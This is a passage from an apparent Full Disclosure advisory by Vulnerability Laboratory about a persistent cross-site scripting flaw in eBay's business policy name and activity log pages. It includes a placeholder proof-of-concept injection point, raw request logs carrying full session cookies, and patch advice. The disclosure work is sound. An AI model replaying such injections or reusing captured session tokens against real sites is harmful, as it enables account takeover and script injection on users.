rdW56bW4AnAA4VQhro25ZK3NIWjJQckJtZGo2d1ZuWStzRVoyUHJBMmRqNkFHa29lbkM1ZUxvUXFkajZ4OW5ZK3NlUT09AJ0ACFUIa6MwMDAwMDAwMTwIsT4ZdmKze+o6aCD30vVea2+e; \
Domain=.ebay.com; Expires=Tue, 17-Mar-2015 18:00:03 GMT; Path=/ \
secses=BAQAAAUSucEmyAAaAAUsAGFUIa6M1MzI3MzdjMC4wLjEuMTEuNzguMi4wLjJ5+5WwmaLoxSDYeRvnyhWgee/Y/g**; \
Domain=.ebay.com; Path=/ lucky9=9393341; Domain=.ebay.com; Expires=Sat, 16-Mar-2019 18:00:03 \
GMT; Path=/] Cache-Control[private]
Pragma[no-cache]
Content-Type[text/plain]
Content-Length[22]
Date[Mon, 17 Mar 2014 18:00:03 GMT]
PoC: Activity log: Return Policy 1 [x]
<div>
<h2 class="act-title">Activity log: <span id="policy_name">Return Policy 1 "><[PERSISTENT \
INJECTED SCRIPT CODES!]);"></span></h2> <div id="activityLogContent" class="act-cnt">
<table cellpadding="0" cellspacing="0">
<thead><tr>
<th class="first">Date/Time</th>
<th class="second">Action</th>
<th class="third">Description</th>
<th class="fourth">Report</th>
</tr></thead></table>
Note: After the exploitation the active log serivce is also compromised.
--- PoC Session Logs [GET] ---
Status: 200[OK] GET http://www.bizpolicy.ebay.com/businesspolicy/x[PERSISTENT INJECTED SCRIPT \
CODE!] Load Flags[LOAD_NORMAL] Größe des Inhalts[1201] Mime Type[text/html]
Request Header:
Host[www.bizpolicy.ebay.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://www.bizpolicy.ebay.com/businesspolicy/manage?totalPages=1]
Cookie[ebay=%5Epsi%3DASTJiAAE*%5EsfLMD%3D1391608831%5Esbf%3D%23200000000000c0048002004%5Ecos%3D1%5Ecv%3D15555%5Esin%3Din%5Ejs%3D1%5Edv%3D53273c55%5E; \
dp1=ba1p/053289001^bl/DE56e9a581^kms/in56e9a581^reg/%5EflagReg%3D1%5E56e9a581^pcid/1599313763550 \
87201^mpc/0%7C7753346d81^pbf/%2340000000000081a88200000455087201^tzo/-3c53274c91^exc/0%3A0%3A0%3 \
A0534ecb81^mms/0.53272b71.053288945^u1p/MjAxNC5rdW56bQ**55087201^u1f/Benjamin55087201^idm/153274c6b^; \
s=BAQAAAUSucEmyAAWAAAEAClMoeF0yMDE0Lmt1bnptAAMAAVMokAEwAWUAAlMokAEjMgAGAAFTKJABMACoAAFTKHhdMQFKA \
BhTKJABNTMyNzM3YzAuMC4xLjExLjc4LjIuMC4yAAwAClMokAExMjI1NjM3OTA2AO4AflMokAExBmh0dHA6Ly9teS5lYmF5L \
mNvbS93cy9lQmF5SVNBUEkuZGxsP015ZUJheSZteWViYXk9JnRva2VuaWQ9NDgmY3VycmVudHBhZ2U9TXllQmF5UHJlZmVyZ \
W5jZXMmc3NwYWdlbmFtZT1zdWNjZXNzQWRQcmVmZXJlbmNlcwcAEgAKUyiQAXRlc3RDb29raWUA9AAiUyiQASQyJEFQS2hOW \
S9QJC51akNnREpDSGIudm1PbzV6TFJUejEA+AAgUyiQAWQwYTVhZTQ1MTQ0MGE0MjhiMzgyZmUzMmZmZmZmZTg0ALgADFMnP60xMzk1MDc5MzUwOjAAPQAKUyiQATIwMTQua3Vuem3M/bEjO3QgStCZxGHoMG4FWaj2Rg**; \
nonsession=BAQAAAUSucEmyAAaAAEAAClUIcgEyMDE0Lmt1bnptAWQAA1UIcgEjOGEABAAKVQhaXTIwMTQua3Vuem0AygAg \
XI1AAWM3N2NmM2RmMTQ0MGEzNTg2YzI0NGFkNGZmZmZmZTRmAMsAAlMnRYkyMQFMABhVCHIBNTMyNzM3YzAuMC4xLjExLjc4 \
LjMuMC4yAU0AGFUIcgE1MzI3M2RkMi4wLjEuMi4xMzYuMC4wLjIAEAAKVQhyATIwMTQua3Vuem0AMwAJVQhyATM0MTI4LERF \
VQDzACJVCHIBJDIkQVBLaE5ZL1AkLnVqQ2dESkNIYi52bU9vNXpMUlR6MQC0AAFTJ+7wMACaAAtTKcndMjAxNC5rdW56bW4A \
nAA4VQhyAW5ZK3NIWjJQckJtZGo2d1ZuWStzRVoyUHJBMmRqNkFHa29lbkM1ZUxvUXFkajZ4OW5ZK3NlUT09AJ0ACFUIcgEwMDAwMDAwMYEG3noCCpfEtIJDQA4W2mCUvROF; \
cssg=d0a5ae451440a428b382fe32fffffe84; cid=xAMhIMTTiG9hpoAp%231599313763; lucky9=9393341; \
npii=btguid/c77cf3df1440a3586c244ad4fffffe4f55087201^cguid/c77cfce61440a56b23d61f96fe2e024155087201^; \
ds1=ats/1395074781098; \
ns1=BAQAAAUSucEmyAAaAAKUADVUIcgExMjI1NjM3OTA2LzA7Z/0uwdxIwLmpExj/Whb9VGXz2oM*; \
secses=BAQAAAUSucEmyAAaAAUsAGFUIcgE1MzI3MzdjMC4wLjEuMTEuNzguMi4wLjJdgCSPs+1ulBCbABPTM3Q2B4zn6g**; \
shs=BAQAAAUSucEmyAAaAAVUADlMwYV01MTYyMjA1MzEwMDQsM0lQMoD56FArTr0IRZNrcW0RgsFk; \
JSESSIONID=D0F0865539CABCE246EB953E8860B953; ds2=asotr/b7qeZzzzzzzz^sotr/b7qeZzzzzzzz^] \
Connection[keep-alive] Response Header:
rlogid[t6al%7Cwliodz%3F%3Cwk%7D1e37e*%3B27c-144d14de1b3-0x96]
Content-Type[text/html;charset=utf-8]
Content-Length[1201]
Date[Mon, 17 Mar 2014 18:29:05 GMT]
Server[eBay Server]
Reference(s):
http://www.ebay.com/businesspolicy/
http://www.bizpolicy.ebay.com/businesspolicy/return
http://www.bizpolicy.ebay.com/businesspolicy/return?profileId=52844186015&mode=edit&catId=ALL&profileName=
http://www.bizpolicy.ebay.com/businesspolicy/return?totalPages=1&profileId=52844186015&pageNumber=1&source=manage
http://www.bizpolicy.ebay.com/businesspolicy/manage?pageNumber=1&totalPages=1&context={%22status%22%3A%22success_edit_return%22}
http://www.bizpolicy.ebay.com/businesspolicy/return?totalPages=1&profileType=RETURN_POLICY&profileId=52844186015&pageNumber=1&source=manage
http://www.bizpolicy.ebay.com/businesspolicy/
http://www.bizpolicy.ebay.com/businesspolicy/manage?totalPages=1
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure encode and parse of the vulnerable policy name \
item list and activity log name list. Restrict the input field for special character and \
disallow wrong inputs by usage of a secure exception-handling to prevent exections.
Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the policy name & \
activity-log module is estimated as medium. (CVSS 4.0)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) \
[www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - \
admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - \
evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - \
vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use \
or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) \
to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]â„¢
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic